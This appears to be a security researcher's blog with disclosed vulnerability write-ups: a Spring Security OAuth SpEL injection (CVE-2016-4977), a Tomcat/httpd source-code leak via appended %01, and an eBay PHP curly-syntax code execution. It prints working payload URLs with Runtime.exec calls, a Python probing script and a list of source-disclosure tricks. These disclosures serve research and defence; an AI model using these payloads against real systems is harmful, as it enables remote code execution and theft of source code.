/* Lines 137-148 of: https://github.com/spring-projects/spring-boot/blob/master/spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/web/ErrorMvcAutoConfiguration.java */

private final SpelView defaultErrorView = new SpelView(
        "Whitelabel Error Page"
        + "This application has no explicit mapping for /error, so you are seeing this as a fallback."
        + "${timestamp}"
        + "There was an unexpected error (type=${error}, status=${status})."
        + "${message}");

@Bean(name = "error")
@ConditionalOnMissingBean(name = "error")
public View defaultErrorView() {
    return this.defaultErrorView;
}

The user-supplied values are passed to the org.springframework.security.oauth2.provider.endpoint.SpelView class, which uses the SpelExpressionParser of oauth2/src/main/java/org/springframework/security/oauth2/provider/endpoint/SpelView.java.

Source code: /spring-security-oauth2/src/main/java/org/springframework/security/oauth2/provider/endpoint/SpelView.java
...
import org.springframework.expression.spel.standard.SpelExpressionParser;
...
private final SpelExpressionParser parser = new SpelExpressionParser();
private final StandardEvaluationContext context = new StandardEvaluationContext();
...
this.helper = new PropertyPlaceholderHelper("${", "}");
...
Expression expression = parser.parseExpression(name); ...

This is interesting. The Spring Expression Language (SpEL) is the syntax used by Spring for configuration and for code placed in annotations. To check whether the parameter is also prone to Spring Expression Language injection, I then passed:

http://localhost:8080/oauth/authorize?
response_type=token&client_id=secalert&scope=openid&redirect_uri=${777-111}

The response message shows "666", which means that the proof-of-concept expression has been evaluated!

Exploiting the RCE (on Linux)

http://localhost:8080/oauth/authorize?response_type=token&client_id=secalert&scope=openid
&redirect_uri=${T(java.lang.Runtime).getRuntime().exec("ls")}

Exploiting the RCE (on Windows, null_ref)

http://localhost:8080/oauth/authorize?
response_type=calc.exe${T%28java.lang.Runtime%29.getRuntime%28%29.exec%28toString%28%29.substring%28112,120%29%29}&client_id=secalert&scope=openid&redirect_uri=http://test

The hotfix

The maintainer released a hotfix: https://pivotal.io/de/security/cve-2016-4977

Race condition in the hotfix may be exploitable

If one reviews the applied bug fix, one may conclude that it looks like a partial fix. They try to prevent recursive placeholders in whitelabel views by using the org.springframework.security.oauth2.common.util.RandomValueStringGenerator class to replace the "${" prefix with a randomized one.

/* Source code: https://github.com/spring-projects/spring-security-oauth/blob/master/spring-security-oauth2/src/main/java/org/springframework/security/oauth2/provider/endpoint/SpelView.java */
...
public SpelView(String template) {
    this.template = template;
    this.prefix = new RandomValueStringGenerator().generate() + "{";
    this.context.addPropertyAccessor(new MapAccessor());
    this.resolver = new PlaceholderResolver() {
        public String resolvePlaceholder(String name) {
            Expression expression = parser.parseExpression(name);
            Object value = expression.getValue(context);
            return value == null ? null : value.toString();
        }
    };
}
...
String maskedTemplate = template.replace("${", prefix);
PropertyPlaceholderHelper helper = new PropertyPlaceholderHelper(prefix, "}");
String result = helper.replacePlaceholders(maskedTemplate, resolver);
result = result.replace(prefix, "${");
    
This looks like a quick-win solution, but if an attacker makes a sufficient number of requests, the RCE could still be exploitable due to a race condition, since the RandomValueStringGenerator class generates a string with the default length of 6.
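
To get a feeling for the size of that random prefix, here is a rough back-of-the-envelope sketch in Python; the alphanumeric alphabet size is an assumption on my part:

# Rough numbers only; the exact character set used by the generator may differ.
alphabet_size = 62   # a-z, A-Z, 0-9 (assumed)
length = 6           # default length of RandomValueStringGenerator

print(f"{alphabet_size ** length:,}")   # 56,800,235,584 possible prefixes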

Whitelabel Error Page on production environment

As a web developer or web admin you should consider disabling the Whitelabel Error Page or using a custom error page with a generic text. Please refer to section 77.2 "Customize the whitelabel error page" on http://docs.spring.io/spring-boot/docs/current/reference/html/howto-actuator.html

Timeline

Feb,  8th 2016: vulnerability discovered and reported to upstream
Feb, 14th 2016: upstream verified the issue
Mar, 12th 2016: upstream deployed a hotfix
Jul,  5th 2016: initial vulnerability report published by upstream
Oct, 13th 2016: this write-up has been published

A tale of an interesting source code leak

Mar, 27th 2016

Background

Lately, while participating in bug bounty programs, I came across an interesting issue which was classified with the highest severity, yielding a potential bug bounty. Due to its terms, I am compelled not to disclose the name of the company.

Information gathering

I started with some information gathering and footprinting. I noticed that the files end with the ".jsp" extension, which often indicates Apache Tomcat. First I reviewed the HTTP response headers in order to gain some information about the target system:

HTTP/1.1 200 OK
Date: 16 Mar 2016 15:15:33 GMT

If the HTTP status code is followed by the Date response header in the second line, it usually means that the page is served by an Apache httpd web server. In this case I assumed that an httpd is used in front of a Tomcat web server. If I am right, then they are probably using some module to dispatch the files between the httpd and the Tomcat web server, which means I could potentially trick the routing into exposing the source code of any ".jsp" or ".inc" file by appending specific lower ASCII characters - depending on whether they are using a connector or a handler.

Connector, Handler, File Descriptor


1) The Apache Tomcat connectors: If Apache httpd and Tomcat are configured to serve content from the same file system location, then care must be taken to ensure that httpd is not able to serve inappropriate content such as the contents of the WEB-INF directory or JSP source code. This could occur if the httpd DocumentRoot overlaps with a Tomcat Host's appBase or the docBase of any Context. It could also occur when using the httpd Alias directive with a Tomcat Host's appBase or the docBase of any Context.

2) Now let's have a look at the Apache web server handlers. A "handler" is an internal Apache representation of the action to be performed when a file is called. Generally, files have implicit handlers, based on the file type. Normally, all files are simply served by the server, but certain file types are "handled" separately. If you want to handle ".jsp" files you may, for example, use the Apache module "mod_mime" to associate the requested filename's extensions with the file's behavior (handlers and filters) and content (mime-type, language, character set and encoding).

What will httpd do if you try to access a file which is not explicitly associated with a handler or filter? Httpd will serve the file as plain text without further action, which means that we can potentially exploit this behaviour.

Analysis

In the case of my research on this particular target system, I knew from the information-gathering analysis that they were handling ".jsp" files, so I assumed that they were using an Apache httpd in the front and a Tomcat or similar web server in the back end of the architecture. So I tried to append some characters to the file extension, like this, in order to get more information by forcing the system into uncaught exceptions and anomalous behaviour:
https://www.victim.tld/password.jsp%00
This, however, did not work as expected. I was expecting the system to expose a stack trace or to run into a web application firewall, but instead it came up with the following message:
HTTP ERROR: 400
Problem accessing /password.jsp%00. Reason:
    The request contains an illegal URL
From several pentests I performed in the past, I knew that the Apache httpd would usually strip the %00 and raise a message like this one:
Not Found
The requested URL /password.jsp was not found on this server.
Therefore I assumed that the error message did not originate from the httpd but from a connector. From past pentests I knew that there were some connectors which led to unusual behaviour when lower ASCII characters were passed to them.

During my research related to Tomcat connectors I found that I might be able to manipulate the routing of the data stream by using the SOH (start of heading, 0x01) transmission control character. The start of heading (SOH) character was designed to mark a non-data section of a data stream, i.e. the part of a stream containing addresses and other housekeeping data.

As I had been successful with this trick in the past with several modules such as mod_proxy_ajp and mod_jk, some Spring Boot implementations and a few others, I tried:
https://www.victim.tld/password.jsp%01
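
The kind of quick probing loop I use for this class of routing confusion looks roughly like the following Python sketch (hedged: whether the HTTP client preserves the raw %XX sequences should be double-checked for your tooling):

import requests

# Hedged sketch: append percent-encoded lower ASCII characters to the
# extension and compare status codes and body sizes against the baseline.
base = "https://www.victim.tld/password.jsp"
suffixes = ["", "%00", "%01", "%20"]

for suffix in suffixes:
    r = requests.get(base + suffix, allow_redirects=False)
    print(f"{suffix or 'baseline':>8}  {r.status_code}  {len(r.content)} bytes")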

What I assumed

In this case I assumed the target system had the following implementation in place:
1) Send the request to Apache httpd
2) httpd uses its file handler/filter to pass the request to Tomcat for processing
3) Tomcat uses its file handler to open the ".jsp" file because it handles the %01 as the start of a new header and not as part of the file extension
4) Tomcat passes the content of the requested file back to httpd, which now has the content of the ".jsp" file for the requested extension ".jsp%01"
5) httpd does not find the ".jsp%01" extension in its file handler's extension list and therefore decides to serve the file as plain text
6) The same also works for ".inc" files on the target system

PoC and reporting

I could potentially have gained access to the whole source code but decided to access only a few ".jsp" and ".inc" files as a proof of concept. I then immediately reported this issue to the company, and within 3 hours they gave me feedback that they had verified the issue and triaged it with the highest severity. They then deployed a hotfix within 48 hours. Respect!

References

http://httpd.apache.org/docs/current/handler.html
http://httpd.apache.org/docs/current/mod/mod_mime.html
https://tomcat.apache.org/connectors-doc/reference/apache.html
Web server handler/filter/modules with similar issues in the past:
CVE-2007-1860: mod_jk double-decoding:
http://www.cvedetails.com/cve/CVE-2007-1860/

WebLogic: http://www.example.com/index.js%70
(via: http://www.securityfocus.com/bid/2527/exploit)

Tomcat: http://www.example.com/examples/snp/snoop%252ejsp
(via:http://www.securityfocus.com/bid/2527/exploit)

IBM Websphere: http://www.example.com/login.JsP
(via: http://www.securityfocus.com/bid/1328/info)

Netscape Web Server: http://www.example.com/login.jsp%20
(via: http://www.securityfocus.com/bid/273/discuss)

Allaire JRun Root directory disclosure:
http://server/%3f.jsp
(via: http://www.securityfocus.com/bid/3592/discuss)

Apache httpd artificially Long Slash Path Directory Listing Vulnerability:
http://www.example.com///[1-4096 slashes here]/admin/*
(via: http://www.securityfocus.com/bid/2503/discuss)

BEA WebLogic Directory Traversal with %00, %2e, %2f and %5c:
http://www.example.com/%5cadmin/
(via:http://www.securityfocus.com/bid/2513/discuss)

My advisories and CVEs

Mar, 15th 2017

Intro

Some of you have reached out to me and asked for my CVEs. Here is a list of some of my security advisories and associated CVE numbers, sorted by vulnerability type.

CVE-2016-4977 Remote Code Execution
CVE-2016-3109 Remote Code Execution
CVE-2011-0635 Remote Code Execution
CVE-2006-7055 Remote Code Execution
CVE-2006-5132 Remote Code Execution
CVE-2006-3793 Remote Code Execution
CVE-2006-3210 Remote Code Execution
CVE-2006-2881 Remote Code Execution
CVE-2006-2852 Remote Code Execution
CVE-2006-2681 Remote Code Execution
CVE-2006-2323 Remote Code Execution
CVE-2010-2339 SQL Injection
CVE-2008-6120 SQL Injection
CVE-2006-3770 SQL Injection
CVE-2006-5128 SQL Injection
CVE-2006-5132 SQL Injection
CVE-2006-3793 SQL Injection
CVE-2006-3210 SQL Injection
CVE-2006-5935 SQL Injection
CVE-2006-5798 SQL Injection
CVE-2006-7077 SQL Injection

ebay.com: RCE using CCS

Dec, 13th 2013

Intro

Once again I have been hunting for security issues on eBay's web sites. This time I identified a controller which was prone to remote code execution due to a type-cast issue in combination with PHP's complex curly syntax. Since these techniques are less known and less discussed, I found it interesting enough to blog about. The vulnerable subdomain is the same one where I identified an exploitable SQL injection last year, namely http://sea.ebay.com.

Information gathering

A legit user request looked like:
https://sea.ebay.com/search/?q=Dave&catidd=1

One of the very first tests I perform against PHP web applications is to look for type-cast issues, because PHP is known to raise warnings or even errors when the value of a given param is an array rather than the string it is expected to be. So obviously my next step was to perform the above request using [] to submit the param as an array:

https://sea.ebay.com/search/?q[]=Dave&catidd=1

The web application served me the same response as for the prior request, which surprised me a bit. From my experience I know that PHP has several ways to handle strings. For example, if a string is enclosed in double quotes, the PHP parser will evaluate code within it under certain circumstances.

PHP complex syntax

Well, if we use php's complex curly syntax we could possibly have some success. Never heard of complex syntax?


Let's give it a try:
https://sea.ebay.com/search/?q={${phpinfo()}}&catidd=1

PHP code evaluation circumstances

This had no success. So let's rethink which circumstances may lead to code evaluation in php.

Which of these is ebay using?

Since this was a blackbox test, I assumed that eBay was using preg_replace() for filtering bad words in combination with the eval() method afterwards, because of two observations I made:
1) They were using a spellchecker. I have seen a bunch of spellcheckers in web apps working with the eval() method in the past.
2) They are using some filter, which I guess to be a blacklist of words that are being replaced with the preg_replace() method.

Blackbox analysis

For example, when I submitted my handle 'secalert', it was stripped and the search query returned results for 'sec'. So obviously they are filtering words like 'alert' from the user-supplied string, maybe in the hope of preventing XSS, which is a very bad idea! Still, the curly-syntax payload didn't work. Okay, it seems like they are not using user-supplied values within double quotes. So what can we do now?

PHP's internal string handling

How does php internally handle strings?

PHP complex syntax + http parameter pollution + array indexing

So let's try to submit an array rather than a string and try to echo the values of the param 'q' by accessing the array indices.
https://sea.ebay.com/search/?q[0]=Dave&q[1]=secalert&catidd=1

It works. The search controller parsed the request, and I got the last array element as part of the result; in this particular case it returned valid entries which matched the keyword 'sec'.

My assumption

But why? As mentioned before, I was assuming that eBay is using preg_replace() for filtering bad words and afterwards doing some eval() work with the return values. What probably happens here is that they try to enforce that user-supplied values are always of type string. That means if a value is not a string, they try to make a string out of it, i.e. they cast the values of the array into a string before doing the string comparison against the bad-word list.

Exploiting the RCE

Okay, good. But how can we exploit that? We put all of this together and submit an array with two indices containing arbitrary values, one of them supplied in complex curly syntax to trick the parser.
https://sea.ebay.com/search/?q[0]=Dave&q[1]=secalert{${phpinfo()}}&catidd=1
Success! Now let's verify this by submitting two more requests.
https://sea.ebay.com/search/?q[0]=Dave&q[1]=secalert{${phpcredits()}}&catidd=1
https://sea.ebay.com/search/?q[0]=Dave&q[1]=secalert{${ini_get_all()}}&catidd=1

Verified! We can evaluate arbitrary php code in context of the ebay website.

From my point of view that was enough to prove the existence of this vulnerability to the eBay security team, and I didn't want to cause any harm. What could an evil hacker have done? He could, for example, have investigated further and tried things like {${`ls -al`}} or other OS commands, and would have managed to compromise the whole web server.

References

http://www.php.net/manual/en/language.types.string.php
http://www.suspekt.org/downloads/DPC_PHP_Security_Crash_Course_06_IncludeAndEval.pdf

Timeline

December,  6th 2013: vulnerability discovered and reported to ebay
December,  9th 2013: ebay solved the issue and deployed a hotfix
December, 13th 2013: this write-up has been published

IMPRESSUM

Impressum:
David Vieira-Kurz
Kemmannweg 26b
13583 Berlin
David.kurz@majorsecurity.com

Privacy / usage notes:

Automated data collection: Simply by visiting this blog, your Internet browser or your mobile device automatically transmits, for technical reasons, non-personal data which we store in a log file. This includes:

  • browser type/version or type and version of the mobile device
  • operating system used
  • referrer URL (the previously visited page)
  • public IP address of the accessing computer
  • amount of data transferred
  • content of the request (specific page)
  • access status / HTTP status code
  • time of the server request
  • version of the app, if applicable

This data is collected exclusively for statistical purposes and to improve the offering for the users of this blog. It is not linked with data that would make you personally identifiable, unless this is strictly required for evidentiary purposes.
This website uses cookies. In addition, 3rd-party cookies from YouTube are set. The operating company of YouTube is YouTube, LLC, 901 Cherry Ave., San Bruno, CA 94066, USA. YouTube, LLC is a subsidiary of Google Inc., 1600 Amphitheatre Pkwy, Mountain View, CA 94043-1351, USA. Further information about YouTube is available at https://www.youtube.com/yt/about/de/. The privacy policy published by YouTube, available at https://www.google.de/intl/de/policies/privacy, provides information about the collection, processing and use of personal data by YouTube and Google.